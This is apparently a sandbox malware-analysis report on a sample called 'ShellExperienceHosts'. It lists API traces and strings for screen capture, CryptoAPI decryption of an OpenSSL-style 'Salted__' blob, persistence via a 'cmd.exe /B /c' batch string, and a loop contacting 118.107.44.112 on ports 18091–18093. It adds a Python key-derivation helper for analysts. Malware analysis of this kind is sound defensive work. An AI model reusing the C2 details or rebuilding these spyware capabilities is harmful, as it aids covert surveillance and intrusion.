                                                                            control_flow_graph 2225 332df10-332df72 call 3330542 Sleep 2228 332df97-332df9d 2225->2228 2229 332df74-332df91 call 332f707 call 332fa29 CloseHandle 2225->2229 2231 332dfa4-332e019 GetLocalTime wsprintfW SetUnhandledExceptionFilter call 332fa29 CloseHandle call 332f707 2228->2231 2232 332df9f call 3327620 2228->2232 2229->2228 2241 332e01b-332e026 call 3322c90 2231->2241 2242 332e028 2231->2242 2232->2231 2244 332e02c-332e046 call 332f707 2241->2244 2242->2244 2248 332e054 2244->2248 2249 332e048-332e049 call 3329730 2244->2249 2251 332e058 2248->2251 2253 332e04e-332e052 2249->2253 2252 332e063-332e06f call 332ce00 2251->2252 2256 332e071-332e0b7 call 332f876 * 2 2252->2256 2257 332e0b9-332e0fa call 332f876 * 2 2252->2257 2253->2251 2266 332e100-332e110 2256->2266 2257->2266 2267 332e152-332e15a 2266->2267 2268 332e112-332e14c call 332ce00 call 332f876 * 2 2266->2268 2269 332e162-332e169 2267->2269 2270 332e15c-332e15e 2267->2270 2268->2267 2273 332e177-332e17b 2269->2273 2274 332e16b-332e175 2269->2274 2270->2269 2276 332e181-332e187 2273->2276 2274->2276 2278 332e1c6-332e1ee call 3330542 call 3322da0 2276->2278 2279 332e189-332e1a3 EnumWindows 2276->2279 2286 332e200-332e2ac call 3330542 CreateEventA call 332f876 call 332ca70 2278->2286 2287 332e1f0-332e1fb Sleep 2278->2287 2279->2278 2281 332e1a5-332e1c4 Sleep EnumWindows 2279->2281 2281->2278 2281->2281 2295 332e2b7-332e2bd 2286->2295 2287->2252 2296 332e318-332e337 call 3325430 2295->2296 2297 332e2bf-332e2f3 Sleep RegOpenKeyExW 2295->2297 2302 332e36a-332e370 2296->2302 2303 332e339-332e365 CloseHandle 2296->2303 2299 332e311-332e316 2297->2299 2300 332e2f5-332e30b RegQueryValueExW 2297->2300 2299->2295 2299->2296 2300->2299 2304 332e372-332e38e call 332fa29 2302->2304 2305 332e390 2302->2305 2303->2252 2308 332e394 2304->2308 2305->2308 2310 332e396-332e39d 2308->2310 2311 332e39f-332e3ae Sleep 2310->2311 2312 332e40d-332e420 2310->2312 2311->2310 2313 332e3b0-332e3b7 2311->2313 2316 332e432-332e46c call 3330542 Sleep CloseHandle 2312->2316 2317 332e422-332e42c WaitForSingleObject CloseHandle 2312->2317 2313->2312 2314 332e3b9-332e3cb 2313->2314 2320 332e3dd-332e408 Sleep CloseHandle 2314->2320 2321 332e3cd-332e3d7 WaitForSingleObject CloseHandle 2314->2321 2316->2252 2317->2316 2320->2252 2321->2320
                                                                            APIs
                                                                              • Part of subcall function 03330542: __fassign.LIBCMT ref: 03330538
                                                                            • Sleep.KERNEL32(00000000), ref: 0332DF64
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0332DF91
                                                                            • GetLocalTime.KERNEL32(?), ref: 0332DFA9
                                                                            • wsprintfW.USER32 ref: 0332DFE0
                                                                            • SetUnhandledExceptionFilter.KERNEL32(033275B0), ref: 0332DFEE
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0332E007
                                                                              • Part of subcall function 0332F707: _malloc.LIBCMT ref: 0332F721
                                                                            • EnumWindows.USER32(03325CC0,?), ref: 0332E19D
                                                                            • Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0332E1AA
                                                                            • EnumWindows.USER32(03325CC0,?), ref: 0332E1BE
                                                                            • Sleep.KERNEL32(00000BB8), ref: 0332E1F5
                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0332E241
                                                                            • Sleep.KERNEL32(00000FA0), ref: 0332E2C4
                                                                            • RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 0332E2EB
                                                                            • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0332E30B
                                                                            • CloseHandle.KERNEL32(?), ref: 0332E35D
                                                                            • Sleep.KERNEL32(000003E8,?,?), ref: 0332E3A4
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0332E3D0
                                                                            • CloseHandle.KERNEL32(?,?,?), ref: 0332E3D7
                                                                            • Sleep.KERNEL32(000003E8,?,?), ref: 0332E3E2
                                                                            • CloseHandle.KERNEL32(?), ref: 0332E400
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0332E425
                                                                            • CloseHandle.KERNEL32(?,?,?), ref: 0332E42C
                                                                            • Sleep.KERNEL32(00000000,?,?,?), ref: 0332E446
                                                                            • CloseHandle.KERNEL32(?), ref: 0332E464
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleSleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
                                                                            • String ID: %4d.%2d.%2d-%2d:%2d:%2d$118.107.44.112$118.107.44.112$118.107.44.112$118.107.44.112$18091$18091$18092$18093$Console$IpDatespecial
                                                                            • API String ID: 1511462596-3132951947
                                                                            • Opcode ID: 96e8a67fee46d46b4cec042ea945679948ced766baa178fcc34072094dd1bdf6
                                                                            • Instruction ID: 4b254f9407b8c70b082ece7ef7514fa92cdd2ce4fd14cee18fc510f96212ec74
                                                                            • Opcode Fuzzy Hash: 96e8a67fee46d46b4cec042ea945679948ced766baa178fcc34072094dd1bdf6
                                                                            • Instruction Fuzzy Hash: AED1D2B8944350AFD320EF64DCC6F2BBBECBB84B01F044A2CF55596285EB71A545CB62

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 2324 332bc70-332bce3 GetDesktopWindow GetDC CreateCompatibleDC GetDC GetDeviceCaps * 2 ReleaseDC 2325 332bcf6-332bcfe GetSystemMetrics 2324->2325 2326 332bce5-332bcf1 2324->2326 2328 332bd00-332bd49 call 33401c0 GetSystemMetrics call 33401c0 2325->2328 2329 332bd4b-332bd69 call 33401c0 GetSystemMetrics call 33401c0 2325->2329 2327 332bd76-332beff GetSystemMetrics call 33401c0 GetSystemMetrics call 33401c0 CreateCompatibleBitmap SelectObject SetStretchBltMode GetSystemMetrics call 33401c0 GetSystemMetrics call 33401c0 StretchBlt call 332eff4 call 3336770 GetDIBits call 332eff4 call 3336770 call 3337660 call 332f707 2326->2327 2358 332bf10-332bf1d call 332c060 2327->2358 2359 332bf01-332bf0e 2327->2359 2340 332bd6e-332bd73 2328->2340 2329->2340 2340->2327 2362 332bf99-332bfc3 call 332eff4 2358->2362 2363 332bf1f-332bf4a DeleteObject * 2 ReleaseDC call 332fac9 2358->2363 2359->2358 2368 332bfc5-332bfc7 2362->2368 2369 332bfc9 2362->2369 2370 332bf55-332bf57 2363->2370 2371 332bf4c-332bf52 call 332fac9 2363->2371 2373 332bfcb-332c006 call 3337660 DeleteObject * 2 ReleaseDC call 332fac9 2368->2373 2369->2373 2374 332bf84-332bf96 call 332f00a 2370->2374 2375 332bf59-332bf5d 2370->2375 2371->2370 2389 332c011-332c015 2373->2389 2390 332c008-332c009 call 332fac9 2373->2390 2378 332bf6a-332bf81 call 332efff 2375->2378 2379 332bf5f-332bf67 call 332efff 2375->2379 2378->2374 2379->2378 2391 332c022-332c04f call 332efff call 332f00a 2389->2391 2392 332c017-332c01f call 332efff 2389->2392 2396 332c00e 2390->2396 2392->2391 2396->2389
                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 0332BC8F
                                                                            • GetDC.USER32(00000000), ref: 0332BC9C
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0332BCA2
                                                                            • GetDC.USER32(00000000), ref: 0332BCAD
                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 0332BCBA
                                                                            • GetDeviceCaps.GDI32(00000000,00000076), ref: 0332BCC2
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0332BCD3
                                                                            • GetSystemMetrics.USER32(0000004E), ref: 0332BCF8
                                                                            • GetSystemMetrics.USER32(0000004F), ref: 0332BD26
                                                                            • GetSystemMetrics.USER32(0000004C), ref: 0332BD78
                                                                            • GetSystemMetrics.USER32(0000004D), ref: 0332BD8D
                                                                            • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 0332BDA6
                                                                            • SelectObject.GDI32(?,00000000), ref: 0332BDB4
                                                                            • SetStretchBltMode.GDI32(?,00000003), ref: 0332BDC0
                                                                            • GetSystemMetrics.USER32(0000004F), ref: 0332BDCD
                                                                            • GetSystemMetrics.USER32(0000004E), ref: 0332BDE0
                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 0332BE07
                                                                            • _memset.LIBCMT ref: 0332BE7A
                                                                            • GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 0332BE97
                                                                            • _memset.LIBCMT ref: 0332BEAF
                                                                              • Part of subcall function 0332F707: _malloc.LIBCMT ref: 0332F721
                                                                            • DeleteObject.GDI32(?), ref: 0332BF23
                                                                            • DeleteObject.GDI32(?), ref: 0332BF2D
                                                                            • ReleaseDC.USER32(00000000,?), ref: 0332BF39
                                                                            • DeleteObject.GDI32(?), ref: 0332BFDF
                                                                            • DeleteObject.GDI32(?), ref: 0332BFE9
                                                                            • ReleaseDC.USER32(00000000,?), ref: 0332BFF5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memset$BitmapBitsDesktopModeSelectWindow_malloc
                                                                            • String ID: ($6$gfff$gfff
                                                                            • API String ID: 3293817703-713438465
                                                                            • Opcode ID: eea88a5ae3c8f89b53c40565887c7162011cd3168fc7c050fd3feef44e47f511
                                                                            • Instruction ID: 66d4692910d70f1c1a0a1f3a4dfe1b3e835d55871179f57a2050a8c0e5d5662a
                                                                            • Opcode Fuzzy Hash: eea88a5ae3c8f89b53c40565887c7162011cd3168fc7c050fd3feef44e47f511
                                                                            • Instruction Fuzzy Hash: 97D179B5E01318AFDB14EFE9E885A9EFBB9FF48300F144529F505AB240DB74A901CB91

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 2462 6c6b8792-6c6b879b 2463 6c6b87db-6c6b87de 2462->2463 2464 6c6b879d-6c6b87a7 2462->2464 2465 6c6b87a9-6c6b87c0 2464->2465 2466 6c6b87c7-6c6b87d8 call 6c6e116e 2464->2466 2467 6c6b87df-6c6b8849 call 6c85c237 CryptAcquireContextW 2465->2467 2468 6c6b87c2-6c6b87c5 2465->2468 2466->2463 2473 6c6b884f-6c6b887c 2467->2473 2474 6c6b8dac-6c6b8df2 call 6c84cc23 call 6c84c646 2467->2474 2468->2466 2476 6c6b887e-6c6b8893 2473->2476 2490 6c6b8df5-6c6b8e10 call 6c6b8792 * 2 2474->2490 2478 6c6b8abb-6c6b8af1 CryptReleaseContext call 6c6b9f40 * 2 2476->2478 2479 6c6b8899-6c6b88ad CryptCreateHash 2476->2479 2503 6c6b8b29-6c6b8b2e 2478->2503 2504 6c6b8af3-6c6b8b07 2478->2504 2482 6c6b88b3-6c6b88b8 2479->2482 2483 6c6b8ce4-6c6b8d3b CryptReleaseContext call 6c84cc23 call 6c84c646 2479->2483 2487 6c6b88ba-6c6b88cb CryptHashData 2482->2487 2488 6c6b88d1-6c6b88d7 2482->2488 2483->2490 2487->2488 2494 6c6b8d40-6c6b8da0 CryptDestroyHash CryptReleaseContext call 6c84cc23 call 6c84c646 2487->2494 2492 6c6b88d9-6c6b88dc 2488->2492 2493 6c6b88e3-6c6b88e9 2488->2493 2492->2493 2499 6c6b88eb 2493->2499 2500 6c6b88ed-6c6b890c call 6c6b9a02 2493->2500 2494->2490 2499->2500 2523 6c6b890e-6c6b8918 call 6c6b9bda 2500->2523 2524 6c6b891d-6c6b8934 CryptHashData 2500->2524 2511 6c6b8b5c-6c6b8b61 2503->2511 2512 6c6b8b30-6c6b8b3a 2503->2512 2508 6c6b8b09-6c6b8b14 2504->2508 2509 6c6b8b1f-6c6b8b26 call 6c6e116e 2504->2509 2519 6c6b8b1a-6c6b8b1d 2508->2519 2520 6c6b8da7 call 6c85c237 2508->2520 2509->2503 2516 6c6b8b8f-6c6b8b94 2511->2516 2517 6c6b8b63-6c6b8b6d 2511->2517 2514 6c6b8b3c-6c6b8b47 2512->2514 2515 6c6b8b52-6c6b8b59 call 6c6e116e 2512->2515 2514->2520 2525 6c6b8b4d-6c6b8b50 2514->2525 2515->2511 2533 6c6b8bc2-6c6b8bd5 2516->2533 2534 6c6b8b96-6c6b8ba0 2516->2534 2531 6c6b8b6f-6c6b8b7a 2517->2531 2532 6c6b8b85-6c6b8b8c call 6c6e116e 2517->2532 2519->2509 2520->2474 2523->2524 2529 6c6b893a-6c6b8962 CryptGetHashParam 2524->2529 2530 6c6b8c28-6c6b8c81 CryptDestroyHash CryptReleaseContext call 6c84cc23 call 6c84c646 2524->2530 2525->2515 2536 6c6b8968-6c6b8973 2529->2536 2537 6c6b8c86-6c6b8cdf CryptDestroyHash CryptReleaseContext call 6c84cc23 call 6c84c646 2529->2537 2530->2490 2531->2520 2539 6c6b8b80-6c6b8b83 2531->2539 2532->2516 2542 6c6b8bb8-6c6b8bbf call 6c6e116e 2534->2542 2543 6c6b8ba2-6c6b8bad 2534->2543 2545 6c6b8981 2536->2545 2546 6c6b8975-6c6b8977 2536->2546 2537->2490 2539->2532 2542->2533 2543->2520 2550 6c6b8bb3-6c6b8bb6 2543->2550 2554 6c6b8a6c-6c6b8a8b CryptGetHashParam CryptDestroyHash 2545->2554 2555 6c6b8987-6c6b898e 2545->2555 2553 6c6b897a-6c6b897c 2546->2553 2550->2542 2553->2554 2558 6c6b8a91-6c6b8ab6 call 6c6b9d9a 2554->2558 2559 6c6b8bd6-6c6b8c23 CryptReleaseContext call 6c84cc23 call 6c84c646 2554->2559 2560 6c6b89dd-6c6b89f2 call 6c84e940 2555->2560 2561 6c6b8990-6c6b8998 2555->2561 2558->2476 2559->2490 2560->2553 2566 6c6b899e-6c6b89d0 2561->2566 2567 6c6b8da2 call 6c6b99f8 2561->2567 2571 6c6b89d2-6c6b89db call 6c6b971e 2566->2571 2572 6c6b89f4-6c6b89fa call 6c6e1139 2566->2572 2567->2520 2581 6c6b89fd-6c6b8a2e call 6c84e940 call 6c84e3c0 2571->2581 2572->2581 2586 6c6b8a5c-6c6b8a69 2581->2586 2587 6c6b8a30-6c6b8a3a 2581->2587 2586->2554 2588 6c6b8a3c-6c6b8a47 2587->2588 2589 6c6b8a52-6c6b8a59 call 6c6e116e 2587->2589 2588->2520 2590 6c6b8a4d-6c6b8a50 2588->2590 2589->2586 2590->2589
                                                                            APIs
                                                                            • CryptAcquireContextW.ADVAPI32 ref: 6C6B8841
                                                                            • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 6C6B88A5
                                                                            • CryptHashData.ADVAPI32(?,?,00000000,00000000), ref: 6C6B88C3
                                                                            • CryptHashData.ADVAPI32(?,?,?,00000000,?,?,?), ref: 6C6B892C
                                                                            • CryptGetHashParam.ADVAPI32(?,00000004,?,?,00000000), ref: 6C6B8954
                                                                            • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 6C6B8A78
                                                                            • CryptDestroyHash.ADVAPI32(?), ref: 6C6B8A83
                                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6C6B8ABE
                                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6C6B8BDC
                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 6C6B8C00
                                                                            • CryptDestroyHash.ADVAPI32(?), ref: 6C6B8C2B
                                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6C6B8C37
                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 6C6B8C5E
                                                                              • Part of subcall function 6C84C646: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,20000000,6C6D830C), ref: 6C84C6A7
                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 6C6B8DCF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Crypt$Hash$Context$Release___std_exception_copy$DataDestroyParam$AcquireCreateExceptionRaise
                                                                            • String ID:
                                                                            • API String ID: 3252232363-3916222277
                                                                            • Opcode ID: f1cda4a049b4ba3cd567638a66b4769d084b65be5af1653566d447ff704db5a6
                                                                            • Instruction ID: 4f92e1879728634344c65f8a71150e66aee5f5772ea1897c9b139c4e21cb3c1c
                                                                            • Opcode Fuzzy Hash: f1cda4a049b4ba3cd567638a66b4769d084b65be5af1653566d447ff704db5a6
                                                                            • Instruction Fuzzy Hash: 2812D0B2E112199FDB24CFA8CD84AEEBBB9FF49304F14862AE405E7750D7309954CB94

                                                                             Control-flow Graph

                                                                             Graph rendering not reproduced. Main path recovered from the basic-block list: entry 6c6b8e2d calls 6c6b84fc (the CryptStringToBinaryA base64 decode) -> CryptAcquireContextW (6c6b8ed2) -> CryptImportKey (6c6b8f31) -> CryptSetKeyParam twice (6c6b8f75, 6c6b8f8d) -> CryptDecrypt, CryptDestroyKey, CryptReleaseContext (6c6b9023) -> result buffer handling (6c6b9057 onward). Each API failure branches to its own cleanup block (6c6b9357, 6c6b93a5, 6c6b93f8, 6c6b9456, 6c6b94b1) that releases whatever key/context handle is held, then calls ___std_exception_copy and throws through 6c84c646 (RaiseException with code E06D7363, a C++ exception).
                                                                            APIs
                                                                              • Part of subcall function 6C6B84FC: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 6C6B8545
                                                                              • Part of subcall function 6C6B84FC: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 6C6B85BD
                                                                            • CryptAcquireContextW.ADVAPI32 ref: 6C6B8F23
                                                                            • CryptImportKey.ADVAPI32(?,?,00000014,00000000,00000000,?), ref: 6C6B8F67
                                                                            • CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 6C6B8F7F
                                                                            • CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000), ref: 6C6B8F9E
                                                                            • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 6C6B9034
                                                                            • CryptDestroyKey.ADVAPI32(?,?,?), ref: 6C6B903F
                                                                            • CryptReleaseContext.ADVAPI32(?,00000000,?,?), ref: 6C6B9049
                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 6C6B937D
                                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6C6B93A9
                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 6C6B93D0
                                                                            • CryptDestroyKey.ADVAPI32(?), ref: 6C6B93FB
                                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6C6B9407
                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 6C6B942E
                                                                              • Part of subcall function 6C84C646: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,20000000,6C6D830C), ref: 6C84C6A7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Crypt$Context$Release___std_exception_copy$BinaryDestroyParamString$AcquireDecryptExceptionImportRaise
                                                                            • String ID: Salt$ed__
                                                                            • API String ID: 2404961614-3701620873
                                                                            • Opcode ID: 333677df537644a96709cc4b88e2730daa5264c12bd2be36ee34e0e506cdd797
                                                                            • Instruction ID: d5c5c36e4bc5b544d87b89f42309127eb397162cde4734f773fcc08c138d1dc7
                                                                            • Opcode Fuzzy Hash: 333677df537644a96709cc4b88e2730daa5264c12bd2be36ee34e0e506cdd797
                                                                            • Instruction Fuzzy Hash: D122CFB2E112189FDB24CF68CD44BEEBBB9BF59308F148629E809B7740D7319954CB94
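The routine above decodes its input with CryptStringToBinaryA (flag 1, CRYPT_STRING_BASE64), imports a 0x14-byte key blob with CryptImportKey, sets KP_IV (1) and KP_MODE (4) on the key and calls CryptDecrypt. Its string table holds the fragments "Salt" and "ed__", which is how an 8-byte "Salted__" magic looks when the compiler checks it with two 32-bit compares; "Salted__" is the header OpenSSL's enc tool writes before an 8-byte salt, after which key and IV are derived with EVP_BytesToKey. The Python below is an added example for this page, not code from the sample or the report: it parses such a container, runs the derivation and lays out the PLAINTEXTKEYBLOB that CryptImportKey consumes. Two things are assumptions, not established by the report: MD5 with one iteration as the digest (OpenSSL's historical default), and an 8-byte key, inferred only from the blob length (8-byte BLOBHEADER + 4-byte length + 8-byte key = 0x14). The cipher step itself is left out because the report does not show the algorithm identifier.

```python
import base64
import hashlib

# OpenSSL 'enc' container: 8-byte magic, 8-byte salt, ciphertext. The magic is checked
# here as two 4-byte fragments, the same way the sample's string table presents it.
MAGIC_LO = b"Salt"
MAGIC_HI = b"ed__"

# CryptoAPI constants matching the call list (meanings per wincrypt.h).
CRYPT_STRING_BASE64 = 0x1
KP_IV = 1
KP_MODE = 4
PLAINTEXTKEYBLOB = 0x8
CUR_BLOB_VERSION = 2
CALG_DES = 0x6601  # assumption: an 8-byte key in a 0x14-byte blob fits DES; not confirmed by the report


def parse_salted_container(b64_text: str):
    """Base64-decode (what CryptStringToBinaryA does with CRYPT_STRING_BASE64) and split an
    OpenSSL-style container into (salt, ciphertext)."""
    raw = base64.b64decode(b64_text, validate=True)
    if len(raw) < 16 or raw[:4] != MAGIC_LO or raw[4:8] != MAGIC_HI:
        raise ValueError("not a Salted__ container")
    return raw[8:16], raw[16:]


def build_salted_container(salt: bytes, ciphertext: bytes) -> str:
    """Inverse of parse_salted_container; used to construct test input."""
    if len(salt) != 8:
        raise ValueError("salt must be 8 bytes")
    return base64.b64encode(MAGIC_LO + MAGIC_HI + salt + ciphertext).decode("ascii")


def evp_bytes_to_key(password: bytes, salt: bytes, key_len: int, iv_len: int,
                     digest: str = "md5", iterations: int = 1):
    """OpenSSL EVP_BytesToKey: D_1 = H(password||salt), D_i = H(D_{i-1}||password||salt),
    each re-hashed 'iterations' times, concatenated until key_len + iv_len bytes exist.
    MD5 with one iteration is OpenSSL's historical default and an assumption here."""
    out = b""
    prev = b""
    while len(out) < key_len + iv_len:
        d = hashlib.new(digest, prev + password + salt).digest()
        for _ in range(iterations - 1):
            d = hashlib.new(digest, d).digest()
        out += d
        prev = d
    return out[:key_len], out[key_len:key_len + iv_len]


def plaintext_key_blob(key: bytes, alg_id: int = CALG_DES) -> bytes:
    """Lay out the PLAINTEXTKEYBLOB that CryptImportKey consumes:
    BLOBHEADER {bType, bVersion, reserved (WORD), aiKeyAlg (DWORD)} + DWORD cbKey + key bytes.
    For an 8-byte key this is 8 + 4 + 8 = 0x14 bytes, the length passed at 6C6B8F67."""
    header = bytes([PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, 0]) + alg_id.to_bytes(4, "little")
    return header + len(key).to_bytes(4, "little") + key


def derive_material(b64_text: str, password: bytes, key_len: int = 8, iv_len: int = 8):
    """Everything up to (not including) CryptDecrypt: container -> salt -> key/IV -> key blob."""
    salt, ciphertext = parse_salted_container(b64_text)
    key, iv = evp_bytes_to_key(password, salt, key_len, iv_len)
    return {"salt": salt, "key": key, "iv": iv,
            "blob": plaintext_key_blob(key), "ciphertext": ciphertext}
```

With the password recovered from the sample, `derive_material` yields the key blob and IV that the CryptImportKey / CryptSetKeyParam(KP_IV) pair receives; the IV is what KP_IV carries, and KP_MODE selects the chaining mode the report does not show.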
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _strlen$CopyFile
                                                                            • String ID: .batkup.$.battor.$.bat$.pid$Failed to create backup DLL. Please check the DLL path: $Failed to create backup EXE. Please check the EXE path: $cmd.exe /B /c "%s"$itor$tor.
                                                                            • API String ID: 2689559967-3443813646
                                                                            • Opcode ID: ec2a7928e28fe65675115c028a548e10f738d45cc0b603915ff28ff0c3369e6a
                                                                            • Instruction ID: 581b95e595250ec8e985a30642647735f39e03b19e602f49248961c66df4e6b6
                                                                            • Opcode Fuzzy Hash: ec2a7928e28fe65675115c028a548e10f738d45cc0b603915ff28ff0c3369e6a
                                                                            • Instruction Fuzzy Hash: E3529BB1900B008BD325CF38C880BA6B7E5FF89318F144A2DD4AA97B91EB71F555CB59

                                                                             Control-flow Graph

                                                                             Graph rendering not reproduced. Main path recovered from the basic-block list: entry 3326a70 calls 332eff4, GetCurrentProcessId, wsprintfW, subcall 3326910 and GetVersionExW -> GetCurrentProcess / OpenProcessToken (3326b03) -> first GetTokenInformation(TokenIntegrityLevel) to size the buffer (3326b27) -> GetLastError -> LocalAlloc (3326b54) -> second GetTokenInformation (3326b6d) -> GetSidSubAuthorityCount / GetSidSubAuthority (3326b8f) -> LocalFree -> CloseHandle (3326bbb) -> final wsprintfW (3326c14) -> 332f00a or 332fac9. Every failing check (version query, token open, both token queries, allocation) skips forward to the final wsprintfW, so a result string is formatted whether or not the integrity level was read.
                                                                            APIs
                                                                            • GetCurrentProcessId.KERNEL32(75BF73E0), ref: 03326A94
                                                                            • wsprintfW.USER32 ref: 03326AA7
                                                                              • Part of subcall function 03326910: GetCurrentProcessId.KERNEL32(18F775C8,00000000,00000000,75BF73E0,?,00000000,033410DB,000000FF,?,03326AB3,00000000), ref: 03326938
                                                                              • Part of subcall function 03326910: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,033410DB,000000FF,?,03326AB3,00000000), ref: 03326947
                                                                              • Part of subcall function 03326910: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,033410DB,000000FF,?,03326AB3,00000000), ref: 03326960
